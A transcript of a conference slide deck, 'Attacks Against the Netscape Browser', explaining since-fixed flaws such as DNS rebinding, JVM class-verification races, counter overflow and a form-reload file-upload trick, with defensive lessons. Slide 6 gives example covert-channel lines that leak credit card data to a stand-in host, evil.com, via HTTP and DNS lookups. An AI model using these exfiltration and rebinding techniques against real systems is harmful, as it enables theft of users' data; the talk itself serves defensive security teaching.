Presentation is loading. Please wait.

Presentation is loading. Please wait.

Attacks Against the Netscape Browser Jim Roskind, PhD VP, Chief Technical Officer AOL Products America Online Inc.

Published by Modified over 10 years ago

Similar presentations

Presentation on theme: "Attacks Against the Netscape Browser Jim Roskind, PhD VP, Chief Technical Officer AOL Products America Online Inc."— Presentation transcript:

1 Attacks Against the Netscape Browser Jim Roskind, PhD VP, Chief Technical Officer AOL Products America Online Inc.

2 Introduction Attacks listed have long since been fixed. …but techniques seem to last forever History forgotten, is doomed to be repeated. Open source policy suggested additional disclosure… and here I am.

3 Who is Jim Roskind? Started doing Java security work on Navigator in November 1995Started doing Java security work on Navigator in November 1995 Participated in most security firedrill responses to dateParticipated in most security firedrill responses to date Worked as Java Security Architect, developing signed code methodologyWorked as Java Security Architect, developing signed code methodology

4 What is an Attack? Data on a computer is taken without permissionData on a computer is taken without permission –Viewing history file, prefs, directory structure –Extreme: Client computer runs attacker’s binary code (a Very Bad Thing TM ) Minor attack would involve revealing a file’s existenceMinor attack would involve revealing a file’s existence

5 What isn’t an Attack? Denial of serviceDenial of service –Too easy for user to terminate or avoid –Too hard to tell where a jpeg decoding is in progress It is very hard to stop a Java threadIt is very hard to stop a Java thread –Threads can catch exceptions, and start new threads :-(

6 Covert Channels: Getting the info Home to evil.com Connect home via http getConnect home via http get –get www.evil.com/goodies?CreditCard… Let DNS lookup carry the infoLet DNS lookup carry the info –get IP for creditCard5551212.goodies.evil.com Covert channels will always existCovert channels will always exist

7 DNS (Domain Name Service) Java applets can traditionally only “phone home”Java applets can traditionally only “phone home” –JS can read content from similarly sourced pages and frames What is the definition of home?What is the definition of home? –Applet sourced from www.evil.com Can the applet contact www.evil.com?Can the applet contact www.evil.com? What exactly is www.evil.com?What exactly is www.evil.com?

8 DNS: Names to IP address DNS Supports multiple IP addresses for a single nameDNS Supports multiple IP addresses for a single name –Are all such IPs equivalent?? DNS is dynamicDNS is dynamic –The mapping is time varying! Is the new IP equivalent to the old IP??Is the new IP equivalent to the old IP??

9 Can you trust DNS info? www.evil.com 6.6.6.666 1.2.3.4 target.victim.com 1.2.3.4 user.victim.com 1.2.3.7 browser firewall

10 First time, DNS is truthful www.evil.com 6.6.6.666 target.victim.com 1.2.3.4 user.victim.com 1.2.3.7 browser firewall Get www.evil.com

11 Second time, DNS misdirects www.evil.com 1.2.3.4 target.victim.com 1.2.3.4 user.victim.com 1.2.3.7 browser firewall Get www. evil.com

12 DNS False Advertising “Real” problem is that DNS info arrived from *outside* containing intranet IP numbers“Real” problem is that DNS info arrived from *outside* containing intranet IP numbers –Firewall should stop such propagation Browser fix: Permanently cache exactly one IP after a single lookupBrowser fix: Permanently cache exactly one IP after a single lookup –Not friendly to dynamic internet… but safe

13 Lesson Relearned: Composition of Safe systems can be unsafe DNS False advertising does not require a compromise of DNS infrastructureDNS False advertising does not require a compromise of DNS infrastructure Don’t assume the world around is fixed and unchangingDon’t assume the world around is fixed and unchanging –DNS had dynamic nature that was NOT conceptually obvious

14 Class Verification in JVM Load a classLoad a class –Work out inheritance and overloading Initialize Vtables while workingInitialize Vtables while working –Vtables are used to call “methods” –Load referenced classes Causes recursion sometimesCauses recursion sometimes –Verify legal calling and arguments –Mark class as Verified

15 Class Verification in JVM Bug was reported that “method dispatch” was causing a “null pointer” exceptionBug was reported that “method dispatch” was causing a “null pointer” exception This meant vtable used before being initialized!This meant vtable used before being initialized! This meant dispatch before verificationThis meant dispatch before verification Problem was in “recursion” handlingProblem was in “recursion” handling

16 Multithreaded JVM Class verification is not easy Class A refers to Class B, and vice versaClass A refers to Class B, and vice versa –Thread 1 starts using class A –Thread 2 starts using class B Thread 1 starts verifying A, thread 2 starts verifying BThread 1 starts verifying A, thread 2 starts verifying B When is verification done? ;-)When is verification done? ;-)

17 Multithreaded apps are everywhere Two applets on a page is actually what surfaced this problemTwo applets on a page is actually what surfaced this problem Reporters of this bug did not mention (or realize) that their app had run on multiple threadsReporters of this bug did not mention (or realize) that their app had run on multiple threads

18 Lesson Relearned: Security fundamental functions, such as class verification, need a LOT of review Independent work caused rewrite of this codeIndependent work caused rewrite of this code Class verification is hardClass verification is hard

19 Page Reloading with Old State Enter text in a formEnter text in a form Follow a linkFollow a link Press backPress back Your original text is restored into formYour original text is restored into form

20 Initial value in forms can be dangerous Initial values for “text” fields are safe, common and helpfulInitial values for “text” fields are safe, common and helpful –Prefill fields to save user typing Initial value for “file” fields are dangerousInitial value for “file” fields are dangerous –A file field specifies file to upload (send? Steal?) to the server

21 JavaScript: The “cache” is not always what it used to be JS can create a page anew at each loadJS can create a page anew at each load –On first load, a field is a text field –On second load, the “same”(?) field is a file field JS loads text field, traverses, “goes back,” reloads, and does the submit.JS loads text field, traverses, “goes back,” reloads, and does the submit. –Be careful to mark the field “types” in saved data!

22 Lesson Relearned: Adding new features (JS) can break old security Original implementation has reasonable assumptionsOriginal implementation has reasonable assumptions –If it is in the cache, it must still be the same value… right?? Browsers are very complex beasts when security is contemplatedBrowsers are very complex beasts when security is contemplated –Adding JS changed all the rules

23 How many Atoms in our Universe? Atom is a spelling of a var or func nameAtom is a spelling of a var or func name –JVM *had* 2^16 possible atom numbers –Who would use more than that many names? Attacker overran counter, and it wrappedAttacker overran counter, and it wrapped –“Verified classes” no longer called the intended method :-/

24 Controlling the number of atoms in the universe Proper solution came much laterProper solution came much later –Max count pushed to 2^32 (or higher?) –Bounds checking was added Short term Navigator solution: abort when atom table exhausted!Short term Navigator solution: abort when atom table exhausted! –Zero reported defects from this hack solution!

25 Lesson relearned: Static limits are evil There is more to overrun than string buffers!There is more to overrun than string buffers! If there is a limit, it must be checkedIf there is a limit, it must be checked

26 Trojan file landing locally JS needs to interact with pages from the same “site” (codebase?)JS needs to interact with pages from the same “site” (codebase?) –Java needs to contact the home site (codebase?) What can local JS and class files do?What can local JS and class files do? –Answer: Access other “local” content –Developers use this feature extensively

27 Trojan content may land in existing files Cookies file contains contents supplied by serverCookies file contains contents supplied by server –Cookies can “look like” HTML and JS

28 If they can’t find local content, they can’t (ab)use it Don’t let server know where content landsDon’t let server know where content lands –“default” user was all too common –prefs.js file? Bookmarks file? Cookies file? Make it hard to guess where user files are kept (Netscape 6/Mozilla technique)Make it hard to guess where user files are kept (Netscape 6/Mozilla technique) Add poison to many filesAdd poison to many files

29 Lesson Relearned: Try to formulate and publicize security requirements The fact that it should be “hard” to guess locations of files is not well publicizedThe fact that it should be “hard” to guess locations of files is not well publicized –3rd party content should not know where it lands Dependencies on “public don’ts” make it hard to maintain securityDependencies on “public don’ts” make it hard to maintain security –Example: Don’t write down your password! –Example: Don’t reuse a password

30 Escaping HTML Classic Server side App FlawClassic Server side App Flaw –To display “<“ use “@lt;” etc. –3rd Party content must be escaped Raw content simulates JS, and accesses cookies etc. etc. etc.Raw content simulates JS, and accesses cookies etc. etc. etc. –News groups? Chat? URL not found?

31 Client side HTML Escaping Most displays appear in “local” contextMost displays appear in “local” context –about:global –about:cache –Content tags in incoming email! Escape, escape, escapeEscape, escape, escape

32 Lesson Relearned: Apply attack techniques to different environments Attacks on server must be studiedAttacks on server must be studied That’s why it was worth mentioning the attack technique here ;-)That’s why it was worth mentioning the attack technique here ;-)

33 Summary: Penetrate and Patch is a large part of real systems A browser is a very complex systemA browser is a very complex system To date, I don’t know of any “in the wild” exploits being usedTo date, I don’t know of any “in the wild” exploits being used –Either we’re doing well, or our head is in the sand

34 Netscape is Always working to improve security Send in security reportsSend in security reportshttp://help.netscape.com/forms/bug-security.html Bugs bounty program of $1000 still in placeBugs bounty program of $1000 still in place –You even get a T-Shirt ;-)

35 Q & A

Download ppt "Attacks Against the Netscape Browser Jim Roskind, PhD VP, Chief Technical Officer AOL Products America Online Inc."

Similar presentations

S.P.R.I.N.T v2.0 User Guide Infrastructure Access Feedback Survey.

S.P.R.I.N.T v2.0 User Guide Infrastructure Access Feedback Survey.
CTER Orientation Tutorial The Use of the WebBoard.

CTER Orientation Tutorial The Use of the WebBoard.
Java Script Session1 INTRODUCTION.

Java Script Session1 INTRODUCTION.
ATTACKING AUTHENTICATION The Web Application Hacker’s Handbook, Ch. 6 Presenter: Jie Huang 10/31/2012.

ATTACKING AUTHENTICATION The Web Application Hacker’s Handbook, Ch. 6 Presenter: Jie Huang 10/31/2012.
Getting Started. Edline Web Site Requirements Provide Students and Parents With: 1.A Brief Course Description 2.Your Email Address 3.Course Syllabus 4.Major.

Getting Started. Edline Web Site Requirements Provide Students and Parents With: 1.A Brief Course Description 2.Your Address 3.Course Syllabus 4.Major.
Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.

Copyright 2004 Monash University IMS5401 Web-based Systems Development Topic 2: Elements of the Web (g) Interactivity.
1 Frameworks. 2 Framework Set of cooperating classes/interfaces –Structure essential mechanisms of a problem domain –Programmer can extend framework classes,

1 Frameworks. 2 Framework Set of cooperating classes/interfaces –Structure essential mechanisms of a problem domain –Programmer can extend framework classes,
1 Software Testing and Quality Assurance Lecture 32 – SWE 205 Course Objective: Basics of Programming Languages & Software Construction Techniques.

1 Software Testing and Quality Assurance Lecture 32 – SWE 205 Course Objective: Basics of Programming Languages & Software Construction Techniques.
Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.

Mobile Code and Worms By Mitun Sinha Pandurang Kamat 04/16/2003.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Maximizing Teaching & Learning For the Short Course.

Maximizing Teaching & Learning For the Short Course.
1 The World Wide Web. 2  Web Fundamentals  Pages are defined by the Hypertext Markup Language (HTML) and contain text, graphics, audio, video and software.

1 The World Wide Web. 2  Web Fundamentals  Pages are defined by the Hypertext Markup Language (HTML) and contain text, graphics, audio, video and software.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.

 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
COMPUTER TERMS PART 1. COOKIE A cookie is a small amount of data generated by a website and saved by your web browser. Its purpose is to remember information.

COMPUTER TERMS PART 1. COOKIE A cookie is a small amount of data generated by a website and saved by your web browser. Its purpose is to remember information.
The Internet & The World Wide Web Notes

The Internet & The World Wide Web Notes
LEARN THE QUICK AND EASY WAY! VISUAL QUICKSTART GUIDE HTML and CSS 8th Edition Chapter 21: Publishing Your Pages on the Web.

LEARN THE QUICK AND EASY WAY! VISUAL QUICKSTART GUIDE HTML and CSS 8th Edition Chapter 21: Publishing Your Pages on the Web.
 What I hate about you things people often do that hurt their Web site’s chances with search engines.

 What I hate about you things people often do that hurt their Web site’s chances with search engines.
Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.

Christopher M. Pascucci Basic Structural Concepts of.NET Browser – Server Interaction.
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
Form Handling, Validation and Functions. Form Handling Forms are a graphical user interfaces (GUIs) that enables the interaction between users and servers.

Form Handling, Validation and Functions. Form Handling Forms are a graphical user interfaces (GUIs) that enables the interaction between users and servers.

Similar presentations

Ads by Google